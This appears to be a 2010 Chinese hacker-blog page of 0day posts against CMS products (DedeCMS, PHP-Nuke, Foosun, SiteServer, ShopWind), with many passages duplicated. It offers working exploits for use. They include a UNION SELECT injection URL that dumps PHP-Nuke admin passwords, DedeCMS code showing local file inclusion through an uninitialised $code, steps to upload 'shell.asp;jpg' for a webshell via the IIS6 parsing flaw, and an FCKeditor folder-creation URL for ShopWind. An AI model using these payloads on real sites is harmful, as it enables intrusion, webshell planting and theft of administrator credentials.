DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
作者:admin 日期:2010-06-22
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
Tags: dedecms
DedeCmsV5.6 本地包含 鸡助0day漏洞
作者:admin 日期:2010-06-22
DedeCmsV5.6 程序plus/carbuyaction.php 变量未初始化,造成本地文件包含漏洞。
代码:
<?php require_once (dirname(__FILE__) . "/../include/common.inc.php"); define('_PLUS_TPL_', DEDEROOT.'/templets/plus'); require_once DEDEINC.'/dedetemplate.class.php'; require_once DEDEINC.'/shopcar.class.php'; require_once DEDEINC.'/memberlogin.class.php'; if($cfg_mb_open=='N') { ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;"); exit(); } $cfg_ml = new MemberLogin(); if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:qing。 ... }elseif($dopost == 'return'){ require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化, $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,"javascript:;",0,3000); exit(); } ?>
代码:
<?php require_once (dirname(__FILE__) . "/../include/common.inc.php"); define('_PLUS_TPL_', DEDEROOT.'/templets/plus'); require_once DEDEINC.'/dedetemplate.class.php'; require_once DEDEINC.'/shopcar.class.php'; require_once DEDEINC.'/memberlogin.class.php'; if($cfg_mb_open=='N') { ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;"); exit(); } $cfg_ml = new MemberLogin(); if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:qing。 ... }elseif($dopost == 'return'){ require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化, $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,"javascript:;",0,3000); exit(); } ?>
PHP168 V6.01 权限提升漏洞
作者:admin 日期:2010-06-22
PHP-Nuke Module print 6.0 SQL注入漏洞
作者:admin 日期:2010-06-22
PHP-Nuke Module print 6.0 网站程序print&sid存在 SQL注入攻击漏洞,可获取管理员密码权限。
EXp:http://www.hackqing.cn/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--
EXp:http://www.hackqing.cn/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--
风讯网站管理系统API_Response.asp页面存在越权漏洞
作者:admin 日期:2010-06-15
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
在文件\API\ API_Response.asp中:If Request.QueryString<>"" Then //第16行SaveUserCookie()ElseSet XmlDoc = Server.CreateObject("msxml2.FreeThreadedDOMDocument" & MsxmlVersion)XmlDoc.ASYNC = FalseIf Not XmlDoc.LOAD(Request) ThenStatus = 1Messenge = "数据非法,操作中止!"appid = "未知"ElseIf Not (XmlDoc.documentElement.selectSingleNode("userip") is nothing) ThenUserTrueIP = XmlDoc.documentElement.selectSingleNode("userip").textEnd IfIf CheckPost() ThenSelect Case ActCase "checkname"整合文件中没有判断程序是否开启,恶意用户可以向该文件提交数据来进行修改删除用户的操作。
官方网站:http://www.foosun.net/,首发wavdb,由情整理编辑
在文件\API\ API_Response.asp中:If Request.QueryString<>"" Then //第16行SaveUserCookie()ElseSet XmlDoc = Server.CreateObject("msxml2.FreeThreadedDOMDocument" & MsxmlVersion)XmlDoc.ASYNC = FalseIf Not XmlDoc.LOAD(Request) ThenStatus = 1Messenge = "数据非法,操作中止!"appid = "未知"ElseIf Not (XmlDoc.documentElement.selectSingleNode("userip") is nothing) ThenUserTrueIP = XmlDoc.documentElement.selectSingleNode("userip").textEnd IfIf CheckPost() ThenSelect Case ActCase "checkname"整合文件中没有判断程序是否开启,恶意用户可以向该文件提交数据来进行修改删除用户的操作。
官方网站:http://www.foosun.net/,首发wavdb,由情整理编辑
Tags: 风讯
SiteServer CMS 注册上传漏洞利用
作者:admin 日期:2010-06-15
SiteServer CMS 网站内容管理系统是基于微软.NET 平台开发的网站内容管理系统,它集成了内容发布管理、多站点管理、定时内容采集、定时生成、多服务器发布、搜索引擎优化、流量统计等多项强大功能,独创的 STL 模板语言,通过Dreamweaver 可视化插件能够任意编辑页面显示样式,生成纯静态页面。
由于附件上传未对文件名进行过滤和自动重命名,导致1.asp;jpg畸形文件上传。利用IIS6.0可执行代码漏洞取网站shell。
漏洞利用:首先进入usercenter/register.aspx注册用户,然后usercenter/login.aspx登录后台。进入管理中心,选择附件上传shell.asp;jpg或者shell.asp;.jpg。通过浏览可获取shell地址。
注:首发tools,由情整理编辑
由于附件上传未对文件名进行过滤和自动重命名,导致1.asp;jpg畸形文件上传。利用IIS6.0可执行代码漏洞取网站shell。
漏洞利用:首先进入usercenter/register.aspx注册用户,然后usercenter/login.aspx登录后台。进入管理中心,选择附件上传shell.asp;jpg或者shell.asp;.jpg。通过浏览可获取shell地址。
注:首发tools,由情整理编辑
WINDOWS最新扩展名欺骗漏洞 ,附雨林木风遍历目录URL(图)
作者:admin 日期:2010-06-15
ShopWind网店系统上传漏洞
作者:admin 日期:2010-06-15
ShopWind网店系统立足做市面上最好的网店系统,长期为客户提供优质的网店系统服务,为网商创造最大的价值! 我们为什么叫Shopwind,我们希望我们的网店系统运行得像风一样快,并且软件要足够安全和稳定. ShopWind采用的是ASP+Access,主要功能包括商品管理,购物车,会员管理,静态页面的生成等功能
第一步:
http://www.hackqing.cn/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fra1nker.asp&NewFolderName=z&uuid=1244789975684
第一步:
http://www.hackqing.cn/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fra1nker.asp&NewFolderName=z&uuid=1244789975684
Tags: ShopWind
